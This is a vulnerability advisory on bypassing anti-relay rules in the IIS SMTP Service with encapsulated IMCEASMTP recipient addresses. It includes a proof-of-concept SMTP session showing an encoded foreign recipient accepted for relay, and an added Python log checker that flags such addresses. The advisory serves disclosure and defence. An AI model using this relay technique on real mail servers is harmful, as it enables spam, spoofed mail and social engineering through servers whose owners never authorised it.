Laurent Frinking of Quark Deutschland GmbH originally discovered this vulnerability. At that time the discovery concerned all versions of Microsoft Exchange 5.5 prior to SP2 with the SP2 IMC patch.
Portcullis have discovered that the Microsoft SMTP Service available with IIS 4.0 and IIS 5.0 is also vulnerable to the encapsulated SMTP address vulnerability, even with anti-relaying features enabled.
This vulnerability allows hosts that are not authorized to relay e-mail via the SMTP server to bypass the anti-relay features and send mail to foreign domains.
The anti-relay rules will be circumvented, allowing spam and spoofed mail to be relayed via the SMTP mail server.
If the Microsoft IIS SMTP Server is used to relay spam mail, this could result in the mail server being black holed, causing disruption to the service.
As the Microsoft IIS SMTP Service is most often utilised in conjunction with IIS for commercial use, this flaw could be used in order to engineer customers, particularly because spoofed e-mail relayed in this way will show the trusted web server in the SMTP header.
220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at Tue, 28 May 2002 14:54:10 +0100
250 test-mailer Hello [IP address of source host]
MAIL FROM: email@example.com
250 2.1.0 firstname.lastname@example.org....Sender OK
RCPT TO: email@example.com
550 5.7.1 Unable to relay for firstname.lastname@example.org
RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk
250 2.1.5 IMCEASMTP-test+40test+2Ecom@victim.co.uk
354 Start mail input; end with <CRLF>.<CRLF>
Subject: You are vulnerable.
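
For defenders reviewing SMTP logs, the check below decodes an encapsulated recipient such as the one accepted in the session above and flags it when the inner address is outside the server's own domains. It is an added example, not part of the original advisory or any Microsoft code; the sample log lines, the LOCAL_DOMAINS set and all function names are assumptions, and only the +XX hex escapes visible in the session are decoded.

```python
import re

# Constructed sample: RCPT TO lines as they might appear in an SMTP log.
SAMPLE_RCPTS = [
    "RCPT TO: <user@victim.co.uk>",
    "RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk",
    "RCPT TO: <IMCEASMTP-sales+40victim+2Eco+2Euk@victim.co.uk>",
]

# Assumption: the domains this server legitimately accepts mail for.
LOCAL_DOMAINS = {"victim.co.uk"}

# Local part layout seen in the session: IMCEA<type>-<encoded address>
IMCEA_RE = re.compile(r"^IMCEA(?P<type>[A-Za-z0-9]+)-(?P<enc>.+)$", re.I)
ESCAPE_RE = re.compile(r"\+([0-9A-Fa-f]{2})")


def decode_encapsulated(rcpt_line):
    """Return the inner address of an IMCEASMTP recipient, or None."""
    addr = rcpt_line.partition(":")[2].strip().strip("<>")
    local_part = addr.rpartition("@")[0]
    m = IMCEA_RE.match(local_part)
    if not m or m.group("type").upper() != "SMTP":
        return None
    # +40 -> "@", +2E -> "." and so on: each +XX is one hex-encoded byte.
    return ESCAPE_RE.sub(lambda h: chr(int(h.group(1), 16)), m.group("enc"))


def is_relay_attempt(rcpt_line, local_domains=LOCAL_DOMAINS):
    """True when the decoded inner address points outside local_domains."""
    inner = decode_encapsulated(rcpt_line)
    if inner is None:
        return False  # ordinary recipient, left to the normal relay rules
    domain = inner.rpartition("@")[2].lower().rstrip(".")
    return domain not in local_domains


def flag_relay_attempts(lines):
    """Return the log lines whose encapsulated target is a foreign domain."""
    return [line for line in lines if is_relay_attempt(line)]


if __name__ == "__main__":
    for hit in flag_relay_attempts(SAMPLE_RCPTS):
        print("possible encapsulated relay:", hit, "->", decode_encapsulated(hit))
```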